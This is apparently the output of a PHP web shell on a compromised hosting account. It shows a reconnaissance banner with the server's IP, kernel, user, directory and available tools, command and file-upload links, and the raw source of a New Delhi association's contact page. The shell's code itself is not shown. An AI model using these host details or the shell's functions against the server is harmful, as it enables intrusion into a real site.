Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/imyrqtmy/public_html/gvadelhincr/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!doctype html> <html lang="en"> <?php include'inc/head.php'; ?> <body class="kw-dark-blue-theme"> <!-- - - - - - - - - - - - - - Layout - - - - - - - - - - - - - - - - --> <div class="kw-wide-layout-type"> <!-- - - - - - - - - - - - - - Search Box (hidden) - - - - - - - - - - - - - - - - --> <!-- - - - - - - - - - - - - - End of Search Box (hidden) - - - - - - - - - - - - - - - - --> <!-- - - - - - - - - - - - - - Header - - - - - - - - - - - - - - - - --> <?php include'inc/header.php'; ?> <!-- - - - - - - - - - - - - - End of Header - - - - - - - - - - - - - - - - --> <!-- - - - - - - - - - - - - - Page Header - - - - - - - - - - - - - - - - --> <div class="kw-page-header kw-dark kw-transparent"> <div class="kw-page-header-content"> <div class="container"> <h1 class="kw-page-title">Contacts</h1> <ul class="kw-breadcrumb"> <li><a href="index.php">Home</a></li> <li>Contacts</li> </ul><!--/ .kw-breadcrumb --> </div><!--/ .container --> </div><!--/ .kw-page-header-content --> <div class="kw-page-header-media" data-bg="images/page_header_bg_11.png"></div><!--/ .kw-page-header-media --> </div> <!-- - - - - - - - - - - - - - End of Page Header - - - - - - - - - - - - - - - - --> <!-- - - - - - - - - - - - - - Page Content - - - - - - - - - - - - - - - - --> <div class="kw-page-content"> <div class="container"> <!-- - - - - - - - - - - - - - Content Section - - - - - - - - - - - - - - - - --> <div class="kw-section kw-large"> <!-- - - - - - - - - - - - - - Content Section - - - - - - - - - - - - - - - - --> <!-- - - - - - - - - - - - - - End of Content Section - - - - - - - - - - - - - - - - --> <!-- - - - - - - - - - - - - - Content Section - - - - - - - - - - - - - - - - --> <div class="kw-section kw-has-sidebar"> <div class="row"> <!-- - - - - - - - - - - - - - Main Content Column - - - - - - - - - - - - - - - - --> <main class="col-sm-7"> <h2>Contact Us</h2> <form novalidate="novalidate" class="wpcf7-form " method="post" action="mail.php"> <ul> <li class="row"> <div class="col-sm-6"> <label for="your-name" class="kw-required">Name</label> <span class="wpcf7-form-control-wrap your-name"> <input type="text" required class="wpcf7-form-control wpcf7-text wpcf7-validates-as-required" size="40" value="" name="your-name" id="your-name"> </span> </div> <div class="col-sm-6"> <label for="your-email" class="kw-required">Email</label> <span class="wpcf7-form-control-wrap your-email"> <input type="email" required class="wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email" size="40" value="" name="your-email" id="your-email"> </span> </div> </li> <li> <label for="your-subject">Subject</label> <span class="wpcf7-form-control-wrap your-subject"> <input type="text" class="wpcf7-form-control wpcf7-text" size="40" value="" name="your-subject" id="your-subject"> </span> </li> <li> <label for="your-message" class="kw-required">Message</label> <span class="wpcf7-form-control-wrap your-message"> <textarea class="wpcf7-form-control wpcf7-textarea wpcf7-validates-as-required" rows="6" cols="40" name="your-message" required id="your-message"></textarea> </span> </li> <li class="form-submit"> <input type="submit" class="wpcf7-form-control wpcf7-submit" value="Send"> </li> </ul> </form> </main> <!-- - - - - - - - - - - - - - End of Main Content Column - - - - - - - - - - - - - - - - --> <!-- - - - - - - - - - - - - - Sidebar - - - - - - - - - - - - - - - - --> <aside id="sidebar" class="col-sm-5 kw-sidebar"> <!-- - - - - - - - - - - - - - Widget - - - - - - - - - - - - - - - - --> <section class="kw-widget"> <h3>Contact Info</h3> <dl class="kw-def-list"> <dt>Address:</dt> <dd>80, देशबंधु सोसाइटी, 15 आईपी एक्सटेंशन, नई दिल्ली-110092</dd> <dt>Email:</dt> <dd><a href="mailto:gahoivaishassociation2024@yahoo.com">gahoivaishassociation2024@yahoo.com</a></dd> <dd><a href="mailto:gahoivaishassociation24@gmail.com">gahoivaishassociation24@gmail.com</a></dd> </dl> <ul class="kw-social-links"> <li><a href="#"><i class="fa fa-facebook"></i></a></li> <li><a href="#"><i class="fa fa-google-plus"></i></a></li> <li><a href="#"><i class="fa fa-twitter"></i></a></li> <li><a href="#"><i class="fa fa-linkedin"></i></a></li> </ul> </section> <!-- - - - - - - - - - - - - - End of Widget - - - - - - - - - - - - - - - - --> </aside> <!-- - - - - - - - - - - - - - End of Sidebar - - - - - - - - - - - - - - - - --> </div> </div> <!-- - - - - - - - - - - - - - End of Content Section - - - - - - - - - - - - - - - - --> </div> <!-- - - - - - - - - - - - - - End of Content Section - - - - - - - - - - - - - - - - --> </div><!--/ .container --> </div> <!-- - - - - - - - - - - - - - End of Page Content - - - - - - - - - - - - - - - - --> <!-- - - - - - - - - - - - - - Footer - - - - - - - - - - - - - - - - --> <?php include'inc/footer.php'; ?> <!-- - - - - - - - - - - - - - End of Footer - - - - - - - - - - - - - - - - --> </div> <!-- - - - - - - - - - - - - - End of Layout - - - - - - - - - - - - - - - - --> <!-- JS Libs & Plugins ============================================ --> <script src="js/libs/modernizr.js"></script> <script src="js/libs/jquery-3.1.0.min.js"></script> <script src="js/libs/jquery.mousewheel-3.0.6.pack.js"></script> <script src="plugins/revolution/js/jquery.themepunch.tools.min.js"></script> <script src="plugins/revolution/js/jquery.themepunch.revolution.min.js"></script> <script src="js/libs/handlebars-v4.0.5.js"></script> <script src="plugins/retina.min.js"></script> <script src="js/libs/jquery.easing.1.3.min.js"></script> <script src="plugins/wt.jquery.nav.1.0.js"></script> <script src="plugins/wt.validator.min.js"></script> <script src="plugins/mad.customselect.js"></script> <script src="plugins/arcticmodal/jquery.arcticmodal-0.3.min.js"></script> <script src="plugins/owl-carousel/owl.carousel.min.js"></script> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.7"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <!-- JS theme files ============================================ --> <script src="js/knowhere.core.js"></script> <script src="js/knowhere.plugins.js"></script> </body> </html>